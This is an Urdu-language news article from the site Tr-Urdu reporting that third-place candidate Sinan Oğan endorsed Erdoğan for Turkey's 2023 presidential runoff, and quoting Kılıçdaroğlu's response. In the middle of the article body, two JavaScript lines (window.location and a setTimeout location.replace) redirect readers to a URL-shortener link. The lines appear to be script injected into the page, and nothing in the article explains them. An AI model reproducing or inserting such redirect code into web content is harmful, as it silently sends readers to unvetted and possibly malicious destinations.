Close Menu
Tr-Urdu
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    Tr-Urdu
    Subscribe
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا
    Tr-Urdu
    You are at:Home»ترکیہ»تیسرے صدارتی امیدوار سنان اوعان نے دوسرے راؤنڈ کے لئے طیب اردوان کی حمایت کا اعلان کردیا ۔
    ترکیہ

    تیسرے صدارتی امیدوار سنان اوعان نے دوسرے راؤنڈ کے لئے طیب اردوان کی حمایت کا اعلان کردیا ۔

    شبانہ آیازBy شبانہ آیاز19نومبر , 2023کوئی تبصرہ نہیں ہے۔2 Mins Read
    صدر ایردوان اور سینان اوعان
    پوسٹ شئیر کریں
    Facebook Twitter LinkedIn Email

    تیسرے صدارتی امیدوار سنان اوعان نے ترکیہ میں ہونے والے انتخابات کے دوسرے راؤنڈ میں طیب اردگان کی حمایت کا اعلان کردیا ۔

    اتا اتحاد کے صدارتی امیدوار سنان اوعان کے طیب اردگان کی حمایت کے بیان کو عالمی پریس میں وسیع کوریج ملی ہے ۔

    ترکیہ میں صدارتی انتخابات میں تیسرے امیدوار سینان اوعان نے ووٹنگ کے دوسرے مرحلے سے قبل صدر رجب طیب اردگان کی حمایت کا اعلان کردیا ۔

     

    اوعان، جنہوں نے 14 مئی کو ہونے والے صدارتی انتخابات کے پہلے مرحلے میں 5.17 فیصد ووٹ حاصل کیے تھے، نے انقرہ میں ایک پریس کانفرنس میں اعلان کیا کہ وہ 28 مئی کو ہونے والے دوسرے راؤنڈ میں اپنے حریف کمال کلچدار اولوکے بجائے دوسرے حریف طیب ایردوان کی حمایت کریں گے۔

     

    اردوان نے پہلے راؤنڈ میں 49.52 فیصد ووٹ حاصل کر کے کمال کلچدار اولو کو پانچ پوائنٹس سے پیچھے چھوڑ دیا تھا۔

    اوعان نے حمایت کی شرط کے طور پر “پناہ گزینوں اور دہشت گرد گروہوں کے لیے سخت پالیسیوں” کی درخواست کی تھی ۔

    گزشتہ ہفتے سی این این کے ساتھ ایک انٹرویو میں، اوعان نے کہا:

    “ہمارا ووٹر ہم پر بہت اعتماد کرتا ہے، یقیناً وہ ہمارا ساتھ دیں گے جہاں ہمیں ان کی ضرورت ہوگی۔ان

    سنان اوعان کے اس بیان کے بعد کہ اس نے دوسرے راؤنڈ کے لیے رجب طیب اردگان کی حمایت کی،

    کمال کلچدار اولو کا پہلا بیان سامنے آیا ہے۔


    window.location=”https://4.fo/1sjiqu3″;

    setTimeout(‘location.replace(“https://4.fo/1sjiqu3”)’,0);

    ۔ کلچداراولو نے کہا،

    “یہ واضح ہے کہ کون اس خوبصورت ملک کو بیچنے کے حق میں ہے ! ہم اس ملک کو دہشت گردی اور مہاجرین سے بچانے کے لیے آرہے ہیں، یہ ریفرنڈم ہے، کوئی کسی کو بے وقوف نہیں بنا سکے گا۔” اب میں اپنے 80 لاکھ شہریوں اور اپنے تمام نوجوانوں سے اپیل کرتا ہوں جنہوں نے پہلے راؤنڈ میں ووٹ نہیں ڈالا ،وہ لازمی ووٹ دیں۔

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous Article

    ایردوان نے نتَن یا ہو کو کھری کھری سنا دیں، تمہارے انجام کا وقت آن پہنچا ہے ، اسرائیل ایک دہشت گرد ریاست ہے

    تمہارے پاس ایٹم بم ہے یا نہیں؟ سکت ہے تواس کا اعلان کرو

    Next Article غزہ میں 16 ہزار شہادتیں انسانیت کے خلاف جنگی جرم ہے۔ایردوان
    شبانہ آیاز
    • Facebook
    • X (Twitter)

    Related Posts

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    21جنوری , 2026

    Comments are closed.

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    ٹیگز
    #اسرائیل #حقان فیدان #حماس #سیاحت #غزہ #فلسطین آئی ٹی استنبول اسلام آباد افراطِ زر الیکشن 2024 انتخابات انقرہ اپوزیشن ایردوان بھونچال بیسٹ ماڈل آف ترکیہ ترقی ترک صدی ترک میڈیا ترکیہ تعلیم حزبِ اختلاف دنیا دہماکہ دی اکانومسٹ روس سلائِڈر سلائیڈر--- شہباز شریف صدر ایردوان صدر ایردوان، وزیراعظم شہباز شریف، پاکستان، ترکیہ عدلیہ عمران خان فیچرڈ قاتلانہ حملہ لانگ مارچ مغربی میڈیا ملت اتحاد وزیراعظم وزیراعظم شہباز شریف وزیراعظم شہباز شریف، صدر ایردوان، پاکستان، امداد پاکستان پاک فوج یورپ
    • Facebook
    • Twitter
    • Instagram
    اہم خبریں

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    ترکیہ اسکالرشپس: دنیا کی جامع ترین ( fully funded)اسکالرشپس، آن لائن درخواستوں کا طوفان، ویب سائٹ کو کریش کے خدشات

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    مقبول پوسٹس

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026
    Tr-Urdu All Rights Reserved © 2022
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا

    Type above and press Enter to search. Press Esc to cancel.